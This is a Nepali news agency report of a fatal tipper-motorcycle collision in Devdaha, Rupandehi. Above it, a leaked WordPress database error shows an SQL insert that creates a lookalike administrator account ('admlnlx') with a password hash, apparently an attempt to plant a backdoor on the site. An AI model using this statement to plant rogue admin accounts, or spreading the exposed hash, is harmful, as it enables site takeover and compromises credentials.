WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrqAYk9Z8w7TDlEKyXb8COpNSCcO3F/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 06:31:18', '', 'admlnlx', 'admlnlx')
रुपन्देही (तिलोत्तमा),माघ ८ –
रुपन्देहीको देवदहमा भएको सडक दुर्घटनामा आज एकजनाको मृत्यु भएको छ । आज दिउँसो टिपरको ठक्करबाट मोटरसाइकलमा सवार देवदह– ४, भवानीपुर निवासी खिमबहादुर पुनको घटनास्थलमै मृत्यु भएको प्रहरीले जनाएको छ ।
पश्चिम क्षेत्रीय ट्राफिक प्रहरी कार्यालय बुटवलले लु १ ख ४६६१ नं को टिपरले देवदह– ५ सिङ्गाहा भित्री सडकमा लु ६ प ४६४९ नं को मोटरसाइकललाई ठक्कर दिएको जनाएको छ ।
टिपरको ठक्करबाट मोटरसाइकलको पछाडि बसेका बुद्धिराज न्यौपाने घाइते भएका छन् । उनको हात कामै नलाग्ने गरी थिचिएको देवदह प्रहरी चौकी प्रमुख भक्ति पाण्डेले जानकारी दिनुभयो ।
ठक्करबाट मृत्यु भएका पुन देवदहको भवानी मावि विद्यालय व्यवस्थापन समितिका सदस्य हुन । ठक्कर दिने टिपर र चालकलाई प्रहरीले नियन्त्रण लिएको छ । – रासस